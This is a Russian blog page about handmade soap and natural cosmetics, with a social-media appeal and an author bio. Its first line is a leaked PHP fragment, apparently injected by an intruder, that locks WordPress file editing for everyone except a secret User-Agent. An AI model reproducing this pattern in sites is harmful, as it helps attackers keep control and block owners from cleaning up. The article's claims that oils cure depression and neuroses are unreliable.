if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Несколько слов о современном мыловарении (мыло ручной работы) | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Несколько слов о современном мыловарении (мыло ручной работы)

На прилавках магазинов и супермаркетов можно частенько встретить мыло и косметику ручной работы, а также все для ванны, сауны и бани

Мыло ручной работы Мыло ручной работы

На при­лав­ках мага­зи­нов и супер­мар­ке­тов мож­но частень­ко встре­тить мыло  и кос­ме­ти­ку руч­ной рабо­ты, а так­же все для ван­ны, сау­ны и бани. Гла­за раз­бе­га­ют­ся, когда смот­ришь на раз­но­цвет­ные брус­ки мыла с завит­ка­ми, мно­го­чис­лен­ные бом­боч­ки для ван­ны и гид­ро­филь­ные плит­ки для тела, йогур­ты и гели, шам­пу­ни и скрабы.

Голо­ва кру­жит­ся от мик­са раз­лич­ных запа­хов: чув­ствен­ный шоко­лад­ный, све­жий мор­ской, мят­ный и ваниль­ный, слад­кий кара­мель­ный и зем­ля­нич­ный. Как гово­рит­ся, на любой вкус, цвет и достаток.

Таб­лич­ки на вит­ри­нах уве­ря­ют нас о 100% нату­раль­но­сти кос­ме­ти­ки руч­ной рабо­ты, а цены боль­но куса­ют­ся и не дают при­об­ре­сти все, что хочет­ся. К сожа­ле­нию, рос­сий­ский мен­та­ли­тет таков, что подоб­ные сред­ства мы чаще поку­па­ем не для себя люби­мых, а в пода­рок. Как же я буду мыть­ся таким доро­гим мылом или поль­зо­вать­ся доро­гим гелем для душа?! А мас­саж­ное мас­ло или бом­боч­ки для ван­ны? Зачем все это? Кто это при­ду­мал? Да и вре­ме­ни на это нет! Мылись наши бабуш­ки всю жизнь хозяй­ствен­ным мылом и непло­хо выгля­де­ли, да и обхо­ди­лись как-то без все­го совре­мен­но­го изли­ше­ства. Имен­но так и рас­суж­да­ет боль­шин­ство жен­щин, что очень печально.

Если рань­ше доро­гая элит­ная кос­ме­ти­ка исполь­зо­ва­лась толь­ко в сало­нах, и что­бы вос­поль­зо­вать­ся ею, нуж­но было запла­тить нема­ло денег и потра­тить нема­ло вре­ме­ни, то сей­час все кар­ди­наль­но изме­ни­лось. Бла­го­да­ря кос­ме­ти­ке и мылу руч­ной рабо­ты мож­но без осо­бо­го тру­да уха­жи­вать за собой, не выхо­дя из дома, при­чем за уме­рен­ную пла­ту. Да, мыло это в разы доро­же, чем туа­лет­ное мага­зин­ное, но ведь и хва­тит его не на неде­лю, а гораз­до доль­ше. А вот поль­зы для кожи от мыла руч­ной рабо­ты боль­ше, чем от фабричного.

Нату­раль­ные мас­ла не толь­ко пре­вос­ход­но увлаж­ня­ют, сохра­ня­ют pH-баланс кожи, пита­ют и сохра­ня­ют моло­дость, но, бла­го­да­ря изыс­кан­ным аро­ма­там, дарят хоро­шее настро­е­ние, тони­зи­ру­ют или, наобо­рот, успо­ка­и­ва­ют, устра­ня­ют голов­ные боли, лечат депрес­сии и нев­ро­зы, при­во­дят в рав­но­ве­сие нерв­ную систе­му. Мож­но пере­чис­лять до бес­ко­неч­но­сти о полез­ных свой­ствах нату­раль­ной кос­ме­ти­ки, но это совер­шен­но ни к чему. Эффект от ее исполь­зо­ва­ния гово­рит сам за себя. Кто хоть раз попро­бо­вал аро­мо­мас­ло или мас­саж­ные пли­точ­ки для тела, кто хоть раз при­нял ван­ну с бом­боч­кой, умыл­ся пен­кой с ромаш­кой, кто еже­днев­но поль­зу­ет­ся йогур­том для тела, тому не нуж­но рас­ска­зы­вать о поль­зе нату­раль­ной косметики.

Так лег­ко пода­рить сво­ей коже самое лучшее!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!